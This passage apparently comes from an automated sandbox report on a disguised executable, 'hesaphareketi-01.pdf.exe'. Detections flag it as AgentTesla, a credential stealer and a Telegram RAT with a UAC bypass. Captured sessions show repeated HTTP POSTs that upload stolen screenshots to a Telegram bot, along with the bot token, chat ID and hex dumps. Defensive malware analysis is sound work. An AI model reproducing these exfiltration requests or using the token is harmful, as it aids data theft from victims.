                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:45:00 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:45:00 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:45:00 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:45:00 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 62 36 64 39 62 34 32 32 65 61 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dccb6d9b422ea1--
                                                2024-05-24 05:45:01 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:45:01 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.2.7 | 49723 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:45:03 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcce4615a1f8c7
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:04 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:45:04 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 34 36 31 35 61 31 66 38 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 65 34 36 31 35 61 31 66 38 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 36 2f 32 30 32 34 20 30 37 3a 32 32 3a 33 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcce4615a1f8c7Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcce4615a1f8c7Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/06/2024 07:22:35User
2024-05-24 05:45:04 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:04 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:04 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:04 UTC | 15447 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:04 UTC | 1179 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:04 UTC | 50 | OUT | Data Ascii: -----------------------------8dcce4615a1f8c7--
2024-05-24 05:45:04 UTC | 402 | IN | HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Fri, 24 May 2024 05:45:04 GMT
    Content-Type: application/json
    Content-Length: 56
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":false,"error_code":400,"description":"Logged out"}


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
18         | 192.168.2.7 | 49724       | 149.154.167.220 | 443              | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 05:45:05 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dcd0bba16aab02
    Host: api.telegram.org
    Content-Length: 66765
    Expect: 100-continue
    Connection: Keep-Alive
2024-05-24 05:45:06 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-05-24 05:45:06 UTC | 1024 | OUT | Data Ascii (multipart body, first chunk):
    -----------------------------8dcd0bba16aab02
    Content-Disposition: form-data; name="chat_id"
    6553028274
    -----------------------------8dcd0bba16aab02
    Content-Disposition: form-data; name="caption"
    New SC Recovered!
    Time: 09/09/2024 10:29:02
    User
2024-05-24 05:45:06 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:06 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:06 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:06 UTC | 15447 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:06 UTC | 1179 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:06 UTC | 50 | OUT | Data Ascii: -----------------------------8dcd0bba16aab02--
2024-05-24 05:45:06 UTC | 402 | IN | HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Fri, 24 May 2024 05:45:06 GMT
    Content-Type: application/json
    Content-Length: 56
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":false,"error_code":400,"description":"Logged out"}


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
19         | 192.168.2.7 | 49725       | 149.154.167.220 | 443              | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 05:45:17 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dcd5bf69ee82a1
    Host: api.telegram.org
    Content-Length: 66989
    Expect: 100-continue
    Connection: Keep-Alive
2024-05-24 05:45:17 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-05-24 05:45:17 UTC | 1024 | OUT | Data Ascii (multipart body, first chunk):
    -----------------------------8dcd5bf69ee82a1
    Content-Disposition: form-data; name="chat_id"
    6553028274
    -----------------------------8dcd5bf69ee82a1
    Content-Disposition: form-data; name="caption"
    New SC Recovered!
    Time: 09/15/2024 19:18:47
    User
2024-05-24 05:45:17 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:17 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:17 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:17 UTC | 15447 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:17 UTC | 1403 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:17 UTC | 50 | OUT | Data Ascii: -----------------------------8dcd5bf69ee82a1--
2024-05-24 05:45:18 UTC | 402 | IN | HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Fri, 24 May 2024 05:45:18 GMT
    Content-Type: application/json
    Content-Length: 56
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":false,"error_code":400,"description":"Logged out"}


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
20         | 192.168.2.7 | 49726       | 149.154.167.220 | 443              | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 05:45:22 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dcd96a0224ce84
    Host: api.telegram.org
    Content-Length: 66765
    Expect: 100-continue
    Connection: Keep-Alive
2024-05-24 05:45:23 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-05-24 05:45:23 UTC | 1024 | OUT | Data Ascii (multipart body, first chunk):
    -----------------------------8dcd96a0224ce84
    Content-Disposition: form-data; name="chat_id"
    6553028274
    -----------------------------8dcd96a0224ce84
    Content-Disposition: form-data; name="caption"
    New SC Recovered!
    Time: 09/20/2024 11:37:30
    User
2024-05-24 05:45:23 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:23 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:23 UTC | 16355 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:23 UTC | 15447 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:23 UTC | 1179 | OUT | Data Raw: (binary file body; hex dump omitted)
2024-05-24 05:45:23 UTC | 50 | OUT | Data Ascii: -----------------------------8dcd96a0224ce84--
2024-05-24 05:45:23 UTC | 402 | IN | HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Fri, 24 May 2024 05:45:23 GMT
    Content-Type: application/json
    Content-Length: 56
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":false,"error_code":400,"description":"Logged out"}


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
21         | 192.168.2.7 | 49727       | 149.154.167.220 | 443              | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 05:45:30 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dcdd588123294f
    Host: api.telegram.org
    Content-Length: 66765
    Expect: 100-continue
    Connection: Keep-Alive


                                                Session ID | Source IP   | Source Port | Destination IP  | Destination Port
                                                22         | 192.168.2.7 | 49728       | 149.154.167.220 | 443
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:45:30 UTC | 262 bytes | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dc7b9c07669e21
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:31 UTC | 25 bytes | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:45:31 UTC | 1024 bytes | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 39 63 30 37 36 36 39 65 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 39 63 30 37 36 36 39 65 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 34 2f 32 30 32 34 20 30 32 3a 34 38 3a 34 34 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dc7b9c07669e21Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dc7b9c07669e21Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/24/2024 02:48:44User
                                                2024-05-24 05:45:31 UTC | 16355 bytes | OUT | Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:45:31 UTC | 16355 bytes | OUT | Data Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:45:31 UTC | 16355 bytes | OUT | Data Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:45:31 UTC | 15447 bytes | OUT | Data Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:45:31 UTC | 1179 bytes | OUT | Data Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:45:31 UTC | 50 bytes | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 39 63 30 37 36 36 39 65 32 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc7b9c07669e21--
                                                2024-05-24 05:45:31 UTC | 402 bytes | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:45:31 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Target ID:0
                                                Start time:01:41:22
                                                Start date:24/05/2024
                                                Path:C:\Users\user\Desktop\hesaphareketi-01.pdf.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\hesaphareketi-01.pdf.exe"
                                                Imagebase:0x7ff7341d0000
                                                File size:2'066'432 bytes
                                                MD5 hash:8F184DAF4D3D0FAC93DB93C798E616ED
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1208684446.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:01:41:22
                                                Start date:24/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:01:41:23
                                                Start date:24/05/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                Imagebase:0x450000
                                                File size:65'440 bytes
                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
